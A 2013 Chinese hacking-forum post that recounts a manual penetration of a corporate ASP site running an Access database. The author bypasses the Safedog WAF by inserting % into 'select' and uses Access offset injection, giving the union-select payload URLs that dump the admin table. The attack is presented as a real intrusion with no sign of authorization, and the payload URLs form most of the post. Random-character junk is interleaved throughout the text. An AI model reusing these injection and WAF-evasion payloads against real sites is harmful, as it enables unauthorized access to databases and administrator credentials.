找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1931|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。) I0 V! g3 O+ q7 F! A

' j) l0 t0 q5 y# Q$ V1 A6 j/ l( V7 Y+ S4 ]& m& \
顺手加个admin
6 D0 z: ^2 ]: a) ~" k* E* S! _
" u4 A" q# X' k" X# _$ h3 S# t( b( `- A
默认后台。
9 X+ |( e8 c4 P  C7 Z# W( Y2 G回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​+ p& `( Y! E4 s3 }; O) v5 h' p
8 a# i! m& H! V7 F3 K! k' I

% v2 N. f, R, [8 O' ]% H) S/ D* d
3 f- c) L9 Z% a" p, Y( X  `+ h所以就不用御剑扫了,待会直接封IP。
, v0 `) s, ^/ u6 p
, L+ j! \7 G; G用order by语句判断是否存在注入。* g8 w9 N( x& r2 Z+ H. L
http://www.xxx.com /product_show.asp?id=997 order by 1- \5 V4 Z/ ?7 S0 O2 x
http://www.xxx.com /product_show.asp?id=997 order by 100
, `5 ^1 F0 t* H现在存在注入,经测试后发现是9个字段。- z$ |! K  X5 j* k# g% E) j5 {0 t
' V0 H/ Y7 N4 w+ u, ]; [
接下来进行联合查询,猜是否存在admin表。9 ^# J; r$ U5 I5 L" ^$ ?' q
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
- Q/ K2 p6 s$ T- D3 a( X) b, h8 c! ~# O' j/ O' ]
  x0 s/ j+ A- Y6 M

3 I8 ?: v. c9 L( D$ V3 k' t2 e+ ^. p7 f在select中间加个%,se%lect绕过安全狗。5 p5 a7 K7 ^' t1 a
' k) c8 C" a1 i) K; \$ M0 u) ^
7 ?% P* _% c. d$ C
发现存在admin表,然后开始手工猜常用的字段。( N+ H, u/ ^) y* X4 T4 o7 [+ i5 F
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
4 V* ]3 H' Y: R% P* f5 Y0 C $ p6 b' ]5 @: X! k( ~6 X' N" z1 x
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
8 ?0 Y2 c0 \# @) r( W" O  H
: |! C3 P/ }7 J% |: G. M科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。# N5 E0 V( L5 u8 d& ~2 l7 w9 L  a
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin& U1 R$ ~& R7 M3 U! K
好了,敏感内容出显了。​" `! f' H  p( q* x7 J

# R2 p  H) }- m1 {# k9 ~
- {% b' }; Q: T* N8 S9 Q- p; P
# @4 @" H* R, X# q# o- j! }& @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表